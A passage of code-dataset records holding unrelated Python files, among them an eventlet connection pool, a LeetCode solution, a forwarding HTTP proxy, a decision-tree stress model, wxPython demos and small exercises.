This relationship is not reliable across ICE\n instances, and should not be depended on in software.\n :return: the URL\n \"\"\"\n return (\n '%(base_url)s/entry/%(id)s' %\n {\n 'base_url': ice_base_url,\n 'id': entry_id,\n }\n )\n","sub_path":"rest/clients/ice/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"356983813","text":"import threading\r\nimport time\r\n \r\n \r\nstop_c = False\r\n \r\ndef c(n):\r\n ti = n\r\n while not stop_c:\r\n time.sleep(1)\r\n ti -= 1\r\n print('remaining', ti, 'seconds')\r\n \r\n if ti == 0:\r\n print('Time is up!')\r\n ti = n\r\n else:\r\n continue\r\n \r\n \r\ndef ans(ans):\r\n global stop_c\r\n ans = input()\r\n if ans == '10':\r\n print(' correct ')\r\n else:\r\n print(' wrong ')\r\n stop_c = True\r\n \r\n \r\no = threading.Thread(target=ans, args=(1, ))\r\nt = threading.Thread(target=c, args=(15, ))\r\nprint('how much is 5 + 5?')\r\nprint('you have 15 seconds')\r\no.start()\r\nt.start()","sub_path":"threaded_timer.py","file_name":"threaded_timer.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"105241683","text":"\n\nfrom xai.brain.wordbase.verbs._herald import _HERALD\n\n#class header\nclass _HERALDING(_HERALD, ):\n\tdef __init__(self,): \n\t\t_HERALD.__init__(self)\n\t\tself.name = \"HERALDING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"herald\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_heralding.py","file_name":"_heralding.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"558074960","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n__version__ = '1.0.0.0'\r\n\r\n\"\"\"\r\n@brief Summary \r\n@details Details\r\n@author luoyuediwu\r\n@date 2016-01-06 \r\n\"\"\"\r\nimport re\r\nfrom eventlet import pools\r\nfrom eventlet import semaphore\r\n\r\nclass Pool(pools.Pool):\r\n \"\"\"TSDB connection pool\"\"\"\r\n def __init__(self, create_method, min_size=0, max_size=2):\r\n super(Pool, self).__init__(min_size=min_size, max_size=max_size)\r\n self.create_method = create_method\r\n self._pool_mutex = semaphore.Semaphore()\r\n\r\n def create(self):\r\n \"\"\"\r\n Override of the parent method\r\n \"\"\"\r\n return self.create_method()\r\n\r\n def get(self):\r\n \"\"\"\r\n Override of the parent method\r\n \"\"\"\r\n # with self._pool_mutex:\r\n return super(Pool, self).get()\r\n\r\n def put(self, item):\r\n \"\"\"\r\n Override of the parent method\r\n \"\"\"\r\n # with self._pool_mutex:\r\n return super(Pool, self).put(item)\r\n\r\n def empty(self):\r\n \"\"\"\r\n Drain the pool\r\n \"\"\"\r\n while self.free_items:\r\n self.get().close()\r\n\r\n\r\nclass ConnectionContext(object):\r\n \"\"\"Connection context\"\"\"\r\n def __init__(self, connection_pool):\r\n self._session = None\r\n self._connection_pool = connection_pool\r\n\r\n def __enter__(self):\r\n self._session = self._connection_pool.get()\r\n return self._session\r\n\r\n def __exit__(self, exc_type, exc_val, exc_tb):\r\n self._connection_pool.put(self._session)\r\n\r\n\r\nclass SingleMeta(type):\r\n \"\"\"Singleton metaclass\"\"\"\r\n def __init__(cls, what, bases=None, dict=None):\r\n super(SingleMeta, cls).__init__(what, bases, dict)\r\n cls._instance = None\r\n\r\n def __call__(cls, *args, **kwargs):\r\n if cls._instance is None:\r\n cls._instance = super(SingleMeta, cls).__call__(*args, **kwargs)\r\n return cls._instance\r\n\r\n\r\ndef parse_tsdb_uri(db_uri):\r\n \"\"\"\r\n Parse a TSDB connection string\r\n @param db_uri: 
xxx://host:port@user/database\r\n @return:\r\n \"\"\"\r\n pattern = re.compile(r\"\"\"\r\n (?P<name>[\\w\\+]+)://\r\n (?:\r\n (?P<username>[^:/]*)\r\n (?::(?P<password>[^/]*))?\r\n @)?\r\n (?:\r\n (?:\r\n \\[(?P<ipv6host>[^/]+)\\] |\r\n (?P<ipv4host>[^/:]+)\r\n )?\r\n (?::(?P<port>[^/]*))?\r\n )?\r\n (?:/(?P<database>.*))?\r\n \"\"\", re.X)\r\n\r\n m = pattern.match(db_uri)\r\n if m is not None:\r\n components = m.groupdict()\r\n return components\r\n else:\r\n return {}","sub_path":"common/db/pool.py","file_name":"pool.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"568778844","text":"'''\r\nAccepted on leetcode(1007)\r\ntime - O(N)\r\nspace - O(1)\r\nApproach:\r\n# As we have to check for a single number which can replace either A or B, that number must be one of the elements at index 0 (either A[0] or B[0])\r\n'''\r\n\r\n\r\nclass Solution:\r\n def minDominoRotations(self, A, B) -> int:\r\n # First we check for A[0]; if that's the number then return the minimum replacement count, or else check for B[0]\r\n retVal = self.check(A, B, A[0])\r\n\r\n if retVal != -1 or A[0] == B[0]:\r\n return retVal\r\n return self.check(A, B, B[0])\r\n\r\n def check(self, A, B, x):\r\n a_rot = 0\r\n b_rot = 0\r\n # iterate over either array and check for 3 cases.\r\n for i in range(len(A)):\r\n if A[i] != x and B[i] != x:\r\n return -1\r\n elif A[i] != x:\r\n a_rot += 1\r\n elif B[i] != x:\r\n b_rot += 1\r\n\r\n return min(a_rot, b_rot)","sub_path":"159_MinimumDominoRotations.py","file_name":"159_MinimumDominoRotations.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"645167503","text":"\"\"\"Requests category information\"\"\"\n\nfrom pylinnworks.api_requests.request import Request\n\n\nclass GetInfoRequest(Request):\n url_extension = ''\n info = []\n name_field = ''\n id_field = ''\n default = '00000000-0000-0000-0000-000000000000'\n\n def __init__(self, api_session):\n super().__init__(api_session)\n\n def test_response(self, response):\n assert isinstance(response.json(), list),\\\n response.text + \" is not valid json\"\n return super().test_response(response)\n\n def process_response(self, response):\n self.info = self.get_info()\n self.names = self.get_names()\n self.ids = self.get_ids()\n\n def get_info(self):\n \"\"\"Return information as dict.\"\"\"\n info = []\n for info_field in self.response_dict:\n new_info_dict = {}\n new_info_dict['name'] = info_field[self.name_field]\n new_info_dict['id'] = info_field[self.id_field]\n info.append(new_info_dict)\n return info\n\n def get_names(self):\n \"\"\"Return Info names as list.\"\"\"\n names = []\n for entry in self.info:\n names.append(entry['name'])\n return names\n\n def get_ids(self):\n \"\"\"Return Info IDs as list.\"\"\"\n ids = []\n for entry in self.info:\n ids.append(entry['id'])\n return ids\n\n def id_lookup(self, name):\n \"\"\"Get id for name\"\"\"\n for entry in self.info:\n if entry['name'] == name:\n return entry['id']\n raise ValueError(name + \" Not in Names\")\n\n def name_lookup(self, _id):\n \"\"\"Get name for _id\"\"\"\n for entry in self.info:\n if entry['id'] == _id:\n return entry['name']\n raise ValueError(_id + \" Not in 
ids\")\n","sub_path":"pylinnworks/api_requests/settings/get_info_request.py","file_name":"get_info_request.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"653351755","text":"#coding=utf-8\nfrom selenium import webdriver\nchrome_capabilities ={\n \"browserName\": \"chrome\",\n \"version\": \"65.0.3325.181\",#注意版本号一定要写对\n \"platform\": \"ANY\",\n \"javascriptEnabled\": True,\n \"marionette\": True,\n}\n\nbrowser=webdriver.Remote(\"http://192.168.192.131:5555/wd/hub\",desired_capabilities=chrome_capabilities) #注意端口号5555是我们上文中映射的宿主机端口号\n\nbrowser.get(\"http://www.baidu.com\")\n\nbrowser.get_screenshot_as_file(\"/home/jack/jenkins/baidu.png\")\n\nbrowser.close()\n\n","sub_path":"jenkins/scripts/seleniumDemp.py","file_name":"seleniumDemp.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"500868772","text":"from flask import request,jsonify\nfrom F.AI import AI\n\n\ndef feature_1(mongo):\n try:\n result=\"\"\n get = request.get_json()\n query=mongo.db.Exist_Query\n check1=query.find_one({\n 'store_id':get['store_id'],\n 'years':get['years'],\n 'months':get['months'],\n 'date':get['date']\n })\n if check1:\n result=jsonify({\n 'electric_predict':str(round(float(check1['electric_predict']),4)),\n 'base64_graph':check1['base64_graph'],\n 'type':'Exist_Query'\n })\n else:\n # down here for calling north's functions~~~~\n elect_predict,encoded=AI(get['store_id'],get['years'],get['months'],get['date'])\n elect_predict=round(elect_predict,4)\n query_id=query.insert({\n \"store_id\":get['store_id'],\n \"years\":get['years'],\n \"months\":get['months'],\n \"date\":get['date'],\n \"electric_predict\":str(elect_predict),\n \"base64_graph\":encoded.decode()\n })\n result=jsonify({\n 'electric_predict':str(elect_predict),\n 'base64_graph':encoded.decode(),\n 'type':'Call_Fuction'\n })\n return result\n except:\n result=jsonify({\n 'message':\"An error or exception occurred\"\n })\n return result","sub_path":"Gen2SAEVERBANK/saver-bank-api/saver-bank-app/F/feature_1.py","file_name":"feature_1.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"388750802","text":"def foo():\n xlist = []\n for i in range(4):\n x = input(\"Enter a number: \")\n xlist.append(x)\n return xlist\nprint(foo())\n#\nxlist= [2,3,1]\nylist=xlist.sort()\nprint(xlist,ylist)\n#\ndef get_formatted_name(first_name,last_name,middle_name = \"\"):\n if middle_name != \"\":\n name = first_name + \" \" + last_name\n else:\n name = first_name + \" \" +middle_name+ last_name\n return name\nprint(get_formatted_name('john','lee','hookie'))\n","sub_path":"tyyy.py","file_name":"tyyy.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"67439798","text":"import instructions\nimport functions\nimport re\nimport sys\nimport struct\n\n\n\n# TODO: Add includes\n# TODO: Fix MW VR & VW\n# TODO: Not JMP/RET warnings\n# TODO: Review code before data\n# TODO: Add .org if needed\n\nclass Assembler(instructions.Assembler, functions.Assembler):\n\n\n\tREG = \"\\%(?:A|B|C|D|FL|SB|SP|PC)\"\n\tREG_IND = \"\\[[ABCD]{1}\\]\"\n\tHEX = \"0x[0-9a-fA-F]{1,6}\"\n\tINT = \"[0-9]{1,8}\"\n\tALPHANUMERIC = \"\\w+\"\n\tOFFSET = \"(?:([\\+\\-]{1})(\" + INT + \"|\" + HEX + \"|\" + REG + 
\")){0,1}\"\n\tNUMBER_INT = \"#\" + INT\n\tLABEL = \"(?:(\\w+)\\:\\s+){0,1}\"\n\tspc = \"\\s+\"\n\tsep = \",\\s+\"\n\n\tMAX_INT = 16777215 # 0xffffff\n\tOPCODES = { \n\t\t\"NOP\": \t0x00,\n\t\t\"HALT\": 0x01,\n\t\t\"MR\": \t0x02,\n\t\t\"MW\": \t0x03,\n\t\t\"VR\":\t0x04,\n\t\t\"VW\":\t0x05,\n\t\t\"LD\":\t0x06,\n\t\t\"DBG\":\t0x07,\n\t\t\"PUSH\": 0x08,\n\t\t\"POP\": 0x09,\n\t\t\"JMP\":\t0x0a,\n\t\t\"RET\":\t0x0b,\n\t\t\"CALL\": 0x0c,\n\t\t\"ARITH\":0x0d\n\t}\n\n\tMODES = {\n\t\t# Addressing modes\n\t\t\"INDIRECT\": \t\t0x00,\n\t\t\"INDIRECT+NEAR\": \t0x01,\n\t\t\"INDIRECT+REG\": \t0x02,\n\t\t\"INDIRECT+FAR\": \t0x03,\n\t\t\"INDIRECT-NEAR\":\t0x04,\n\t\t\"INDIRECT-REG\":\t\t0x05,\n\t\t\"INDIRECT-FAR\":\t\t0x06,\n\t\t\"ABSOLUTE\":\t\t\t0x07,\n\t\t\"ABSOLUTE+NEAR\":\t0x08,\n\t\t\"ABSOLUTE+REG\":\t\t0x09,\n\t\t\"ABSOLUTE+FAR\":\t\t0x0a,\n\t\t\"ABSOLUTE-NEAR\":\t0x0b,\n\t\t\"ABSOLUTE-REG\":\t\t0x0c,\n\t\t\"ABSOLUTE-FAR\":\t\t0x0d,\n\t\t\"unused1\":\t\t\t0x0e,\n\t\t\"unused2\":\t\t\t0x0f,\n\n\t\t# Value modes\n\t\t\"REGISTER\":\t\t\t0x00,\n\t\t\"VALUE\":\t\t\t0x01\n\t}\n\n\tREGISTERS = {\n\t\t\"%A\": \t\t0x00,\n\t\t\"%B\": \t\t0x01,\n\t\t\"%C\": \t\t0x02,\n\t\t\"%D\": \t\t0x03,\n\t\t\"unused1\":\t0x04,\n\t\t\"unused2\":\t0x05,\n\t\t\"unused3\":\t0x06,\n\t\t\"unused4\":\t0x07,\n\t\t\"unused5\":\t0x08,\n\t\t\"unused6\":\t0x09,\n\t\t\"unused7\":\t0x0a,\n\t\t\"unused8\":\t0x0b,\n\t\t\"%FL\":\t\t0x0c,\n\t\t\"%SB\":\t\t0x0d,\n\t\t\"%SP\":\t\t0x0e,\n\t\t\"%PC\":\t\t0x0f\n\t}\n\n\n\n\tARITH_FUNCS = {\n\t\t\"ADD\":\t0x00,\n\t\t\"SUB\":\t0x01,\n\t\t\"DIV\":\t0x02,\n\t\t\"MUL\":\t0x03,\n\t\t\"IDIV\":\t0x04,\n\t\t\"IMUL\":\t0x05\n\t}\n\n\n\tline_count = 1;\n\tinstructions = []\n\tcode = []\n\tdata = []\n\tlabelpass = []\n\n\tbinary_file = []\n\t\t\n\tlabels = dict()\n\n\tcurrent_code_addr = 0\n\tcurrent_data_addr = 0\n\tin_code = True\n","sub_path":"oldfiles/oldcode/tools/assembler/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"192600011","text":"###########################################################\n### v1 - funcs, using deque + rotate\n\nfrom collections import deque\n\nrows, columns = [int(el) for el in input().split()]\nsnake = deque(list(input()))\n\n\ndef create_matrix(rows, columns, snake):\n matrix = []\n for row in range(rows):\n matrix.append([])\n for col in range(columns):\n matrix[row].append(snake[0])\n snake.rotate(-1)\n return matrix\n\n\ndef print_matrix(matrix):\n for i in range(rows):\n if i % 2 != 0:\n matrix[i].reverse()\n print(\"\".join(matrix[i]))\n\n\n\nmatrix = create_matrix(rows, columns, snake)\nprint_matrix(matrix)\n\n\n###########################################################\n###########################################################\n### v2 - no funcs, using only lists and list slicing\n\nrows, cols = [int(el) for el in input().split()]\nword = input()\ncount = 0\na_list = []\n\nfor _ in range(rows * cols):\n if count == len(word):\n count = 0\n a_list.append(word[count])\n count += 1\n\na_list = ''.join(a_list)\nstart, stop = 0, cols\n\nfor i in range(rows):\n if i % 2 != 0:\n print(a_list[stop - 1:start - 1:-1])\n else:\n print(a_list[start:stop])\n start += cols\n stop += cols\n\n###########################################################\n###########################################################\n### v3 no funcs but with some killer snake moves!!!\n\nfrom collections import deque\nrows, cols = input().split()\nline = 
deque(list(input()))\nmatrix = [[0 for el in range(int(cols))] for row in range(int(rows))]\n\nfor row_index in range(int(rows)):\n if row_index % 2 == 0:\n for col_index in range(int(cols)):\n matrix[row_index][col_index] = line[0]\n line.rotate(-1)\n print(*matrix[row_index], sep=\"\")\n else:\n for col_index in range(int(cols)-1, -1, -1):\n matrix[row_index][col_index] = line[0]\n line.rotate(-1)\n print(*matrix[row_index], sep=\"\")\n","sub_path":"python_advanced_jan 2021/python_advanced/03 multidimensional_lists/03.02. exercise/05. snake_moves.py","file_name":"05. snake_moves.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"604898735","text":"#!/usr/bin/env python\n# Copyright (c) 2019 VMware, Inc. All Rights Reserved.\n# SPDX-License-Identifier: BSD-2 License\n# The full license information can be found in LICENSE.txt\n# in the root directory of this project.\n\nimport platform\n\nLINUX_OS = \"Linux\" in platform.uname()\n\n# Logging Constants\nLINUX_LOG_DIR = \"/var/log/axon\"\nWIN_LOG_DIR = \"C:\\\\axon\\\\log\"\nLOG_DIR = LINUX_LOG_DIR if LINUX_OS else WIN_LOG_DIR\nLOG_FILE = \"axon.log\"\n\n# Axon Service Constants\nAXON_PORT = 5678\n\n# Recorder Constants\nWAVEFRONT = 'wavefront'\nSQL = 'sql'\n","sub_path":"axon/common/consts.py","file_name":"consts.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"51474840","text":"#encoding=utf-8\nimport socket\nimport threading\nimport re\nimport traceback\n\n# 提取目地服务器地址\ndef getAddr(data): \n data = data.decode('utf8')\n re_result = re.search(\"Host: (.*)\\r\\n\", data)\n host = re_result.group(1)\n addr = host.split(\":\")\n if len(addr) == 1:\n return (addr[0], 80)\n return (addr[0], int(addr[1]))\n\n# 等待server数据,转发回client\ndef waitServerResponse(server, client):\n try:\n while 1:\n data = server.recv(10240)\n if not data:\n break\n client.sendall(data)\n except:\n pass\n\ndef handleClientReq(conn, caddr):\n try:\n https_addr = None\n server = None\n while 1: \n data = conn.recv(10240) # buffer=1M\n # 空数据则关闭连接\n if not data:\n break\n # 代理https请求时,client会先发送个CONNECT请求告知目的地址\n if b\"CONNECT\" in data:\n # 提取https请求中的目地地址\n https_addr = getAddr(data)\n conn.send(b\"HTTP/1.1 200 Connection established\\r\\n\\r\\n\")\n print(\"https请求connect完成\")\n continue\n # 提取http请求中的目地地址\n if not https_addr:\n addr = getAddr(data)\n print( '发给目的服务器数据:',data )\n else:\n addr = https_addr\n print( '您的连接是https,发送的数据已经被加密...',)\n # 连接目地服务器\n if not server:\n print( \"目的服务器:\", addr)\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n server.connect(addr)\n # 启动一个等待server response的线程\n t = threading.Thread(target=waitServerResponse, args=(server, conn)).start()\n server.sendall(data) #将请求数据发给目的服务器 \n print(\"连接代理完成:\", caddr)\n except Exception as e:\n print('代理的客户端异常:%s, ERROR:%s'%(caddr,e))\n traceback.print_exc()\n finally:\n # 关闭连接\n conn.close()\n server.close()\n\ndef serve():\n PORT=10086\n IP = \"0.0.0.0\"\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind((IP, PORT))\n s.listen(10)\n print('代理服务器启动在 %s:%s...' 
% (IP,PORT))\n try:\n while True:\n conn, addr = s.accept()\n print('\\n连接来自: ', addr)\n # 多线程处理请求\n t = threading.Thread(target=handleClientReq, args=(conn, addr)).start()\n finally:\n s.close()\n\ntry:\n serve()\nexcept Exception as e:\n print( '代理服务器异常', e)\n\n\n\n","sub_path":"proxy/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"303626429","text":"import datetime\n\nfrom src.node import build_hashgraph_from_event_history\nimport logging\n\n\nlog = logging.getLogger('run_hashgraph')\nlog.setLevel(logging.DEBUG)\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nlog.addHandler(ch)\n\nif __name__ == \"__main__\":\n start_time = datetime.datetime.now()\n build_hashgraph_from_event_history('/home/trafim/git/openworld/debug/event_history_node_0_2018-01-22_15:00:14.csv',\n save_image=False)\n end_time = datetime.datetime.now()\n log.info('Time elapsed {}.'.format(end_time - start_time))\n","sub_path":"src/debug_hashgraph.py","file_name":"debug_hashgraph.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"519757504","text":"# Import dependencies\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn import metrics\r\nfrom sklearn import preprocessing\r\ndataset_url = \"https://github.com/rt16/ml_model_api/blob/main/stress_data_set.csv\"\r\ncol_names = ['I found it hard to wind down',\r\n 'I tended to over-react to situations',\r\n 'I felt that I was using a lot of nervous energy',\r\n 'I found myself getting agitated',\r\n 'I found it difficult to relax',\r\n 'I was intolerant of anything that kept me from getting on with what I was doing',\r\n 'I felt that I was rather touchy',\r\n 'Result']\r\ndata = pd.read_csv(dataset_url)\r\nprint(data);\r\nfrom sklearn.preprocessing import LabelEncoder\r\nlabel_encoder = LabelEncoder()\r\n#apply label encoding\r\ndata['I found it hard to wind down'] = label_encoder.fit_transform(data['I found it hard to wind down'])\r\ndata['I tended to over-react to situations'] = label_encoder.fit_transform(data['I tended to over-react to situations'])\r\ndata['I felt that I was using a lot of nervous energy'] = label_encoder.fit_transform(data['I felt that I was using a lot of nervous energy'])\r\ndata['I found myself getting agitated'] = label_encoder.fit_transform(data['I found myself getting agitated'])\r\ndata['I found it difficult to relax'] = label_encoder.fit_transform(data['I found it difficult to relax'])\r\ndata['I was intolerant of anything that kept me from getting on with what I was doing'] =label_encoder.fit_transform(data['I was intolerant of anything that kept me from getting on with what I was doing'])\r\ndata['I felt that I was rather touchy'] = label_encoder.fit_transform(data['I felt that I was rather touchy'])\r\ndata['Result'] = label_encoder.fit_transform(data['Result'])\r\nprint(data.head(20))\r\nfeature_cols = ['I found it hard to wind down',\r\n 'I tended to over-react to situations',\r\n 'I felt that I was using a lot of nervous energy',\r\n 'I found myself getting agitated',\r\n 'I found it difficult to relax',\r\n 'I was intolerant of anything that kept me from getting on with what I was doing',\r\n 'I felt that I was rather 
touchy']\r\nresult_cols = ['Result']\r\nX = data[feature_cols] # Features\r\ny = data[result_cols] # Target variable\r\n# Split dataset into training set and test set\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2,random_state=1) # 80% training and 20% test\r\n# Create Decision Tree classifier object\r\nclf = DecisionTreeClassifier()\r\n\r\n# Train Decision Tree Classifier\r\nclf = clf.fit(X_train, y_train)\r\n\r\n# Predict the response for test dataset\r\ny_pred = clf.predict(X_test)\r\nprint(clf.predict([[1,1,1,1,1,1,1]]))\r\nprint(\"Accuracy:\", metrics.accuracy_score(y_test, y_pred))\r\n# Save your model\r\nimport joblib\r\njoblib.dump(clf, 'model.pkl')\r\nprint(\"Model dumped!\")\r\n\r\n# Load the model that you just saved\r\nclf = joblib.load('model.pkl')\r\n\r\n# Saving the data columns from training\r\nmodel_columns = list(X.columns)\r\nprint(model_columns)\r\njoblib.dump(model_columns, 'model_columns.pkl')\r\nprint(\"Model columns dumped!\")\r\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"468619823","text":"import math\r\nimport datetime\r\nimport numpy as np\r\nimport itertools\r\nfrom scipy.cluster.hierarchy import dendrogram, linkage, average, fcluster, fclusterdata, to_tree\r\n\r\n\r\nNonRedundantSequencesFileName = \"/panfs/pan1/orphancrispr/ClusteringRepeats/0703/Nonredundant_repeats.txt\"\r\nRepeatsAssignedFileName = \"/panfs/pan1/orphancrispr/ClusteringRepeats/0703/RepeatsIdentical.txt\"\r\nRepeatsSimilaritiesFileName = \"/panfs/pan1/orphancrispr/AllRepeatsVsAllRepeats_fix.hits\"\r\nAllArraysInfoFileName =\"/home/utkinai2/Project1/merged_all.csv\"\r\nFilteredRepeatsSimilaritiesFileName = \"/panfs/pan1/orphancrispr/ClusteringRepeats/0703/AllRepeatsVsAllRepeats_fix_filtered_Dist.hits\"\r\n\r\n\r\nRepeatLengthsByID = {}\r\nfor line in open(AllArraysInfoFileName,\"r\"):\r\n LineValues = line[:-1].split(\",\")\r\n RepeatLengthsByID[str(LineValues[2] + '_' + LineValues[3] + '_' + LineValues[4])] = len(LineValues[6])\r\n\r\nNonRedundantSet = set()\r\nfor line in open(NonRedundantSequencesFileName, \"r\"):\r\n NonRedundantSet.add(line[:-1])\r\n\r\nUniqueSet = set()\r\nprint(datetime.datetime.now())\r\nwith open (FilteredRepeatsSimilaritiesFileName, \"w\") as FilteredFile:\r\n for line in open(RepeatsSimilaritiesFileName, \"r\"):\r\n LineValues = line[:-1].split('\\t')\r\n Name1 = LineValues[0]\r\n Name2 = LineValues[1]\r\n if (Name1, Name2) in UniqueSet:\r\n continue\r\n\r\n if Name1 in NonRedundantSet and Name2 in NonRedundantSet:\r\n Coverage = int(LineValues[2]) / int(max(RepeatLengthsByID[Name2], RepeatLengthsByID[Name1]))\r\n if Coverage > 0.8:\r\n Score = int(LineValues[3]) * min(RepeatLengthsByID[Name1], RepeatLengthsByID[Name2]) / (\r\n max(RepeatLengthsByID[Name2], RepeatLengthsByID[Name1]) * 2 * int(LineValues[2]))\r\n if Score != 1:\r\n Dist = - math.log(Score)\r\n FilteredFile.write(Name1 + '\\t' + Name2 + '\\t' + str(Dist) + '\\n')\r\n UniqueSet.add((Name1, Name2))\r\n else:\r\n if (Name1,Name2) not in UniqueSet:\r\n Dist = 0.0\r\n FilteredFile.write(Name1 + '\\t' + Name2 + '\\t' + str(Dist) + '\\n')\r\n UniqueSet.add((Name1, Name2))\r\n else:\r\n continue\r\n # if (Name1, Name2) in DictWithDoubledScores:\r\n # DictWithDoubledScores[Name1, Name2] = max(int(DictWithDoubledScores[Name1, Name2]), Dist)\r\n # else:\r\n # DictWithDoubledScores[Name1, Name2] = max(0, Dist)\r\n\r\n # else:\r\n # if 
(Name1, Name2) not in UniqueSet:\r\n # Dist = 1.0\r\n # FilteredFile.write(Name1 + '\\t' + Name2 + '\\t' + str(Dist) + '\\n')\r\n # UniqueSet.add((Name1, Name2))\r\n # else:\r\n # continue\r\nprint(datetime.datetime.now())\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"ClusteringRepeats_0703_step2.py","file_name":"ClusteringRepeats_0703_step2.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"142750185","text":"# coding: utf-8\n\nimport wx\n\napp = wx.App()\nframe = wx.Frame(None, wx.ID_ANY, \"タイトル付きBoxSizer\", size=(300,300))\n\npanel = wx.Panel(frame, wx.ID_ANY)\npanel.SetBackgroundColour(\"#AFAFAF\")\n\nbutton_1 = wx.Button(panel, wx.ID_ANY, \"ボタン1\")\nbutton_2 = wx.Button(panel, wx.ID_ANY, \"ボタン2\")\nbutton_3 = wx.Button(panel, wx.ID_ANY, \"ボタン3\")\n\nbox = wx.StaticBox(panel, wx.ID_ANY, \"boxsizer_static\")\n\nlayout = wx.StaticBoxSizer(box, wx.HORIZONTAL)\n# layout = wx.StaticBoxSizer(box, wx.VERTICAL)\n\nlayout.Add(button_1)\nlayout.Add(button_2)\nlayout.Add(button_3)\n\npanel.SetSizer(layout)\n\nframe.Show()\napp.MainLoop()","sub_path":"wxpython_proc/06_boxsizer_static.py","file_name":"06_boxsizer_static.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"463524972","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 11 11:34:11 2017\n\n@author: PaulJ\n\"\"\"\n\n\nimport datetime as dt\nimport pandas as pd\nimport tkinter as tk\nimport em_global_variables\n# from extract_fastest_stats import extract_fastest_stats\n\n\nEXERCISE_STATS = em_global_variables.EXERCISE_STATS\n\n\ndef create_fastest_stats_lf(\n parent_frame,\n activity_or_summary_object,\n row=0,\n column=1,\n overall=False,\n frame_title='Fastest Time in Activity',\n frame_title_font=em_global_variables.TABLE_TITLE_FONT):\n \"\"\"\n Function to create fastest stats labelframe\n \"\"\"\n # Start of Time, VDOT by Distance Stats\n fslf_ysize = 5\n\n # Get Fastest Stats from Exercise Summary File\n if not overall:\n try:\n if activity_or_summary_object.ex_sum['Activity_Type'] == \"Running\":\n running_only = True\n else:\n running_only = False\n except KeyError:\n running_only = False\n else:\n activity_list = (\n activity_or_summary_object.get_all_act_sum()['Activity_Types'])\n try:\n if len(activity_list) == 1 and activity_list[0] == \"Running\":\n running_only = True\n else:\n running_only = False\n except KeyError:\n running_only = False\n\n try:\n fastest_stats = activity_or_summary_object.get_records()\n except ValueError:\n fastest_stats = pd.DataFrame()\n\n # Fastest Stats LabelFrame/Table Heading\n fastest_stats_lf = tk.LabelFrame(parent_frame,\n text=frame_title,\n font=frame_title_font,\n padx=5, pady=5)\n fastest_stats_lf.grid(row=row,\n column=column,\n sticky=('n'))\n\n if len(fastest_stats) == 0:\n pace_stats_no_stats = tk.Label(\n fastest_stats_lf,\n text='There are no fastest stats for this activity',\n font=em_global_variables.TABLE_SUBTITLE_FONT,\n padx=10,\n pady=10,\n justify='left')\n pace_stats_no_stats.pack(anchor='n',\n fill='both',\n side='left')\n return 1, 3\n\n # Fastest Stats Column Heading\n fs_dist_subtitle1 = tk.Label(fastest_stats_lf,\n text='Distance',\n padx=3, pady=3,\n font=em_global_variables.TABLE_SUBTITLE_FONT)\n fs_dist_subtitle1.grid(row=0, column=0, sticky=('n'))\n fs_dist_subtitle2 = tk.Label(fastest_stats_lf,\n text=' Time ',\n padx=3, pady=3,\n 
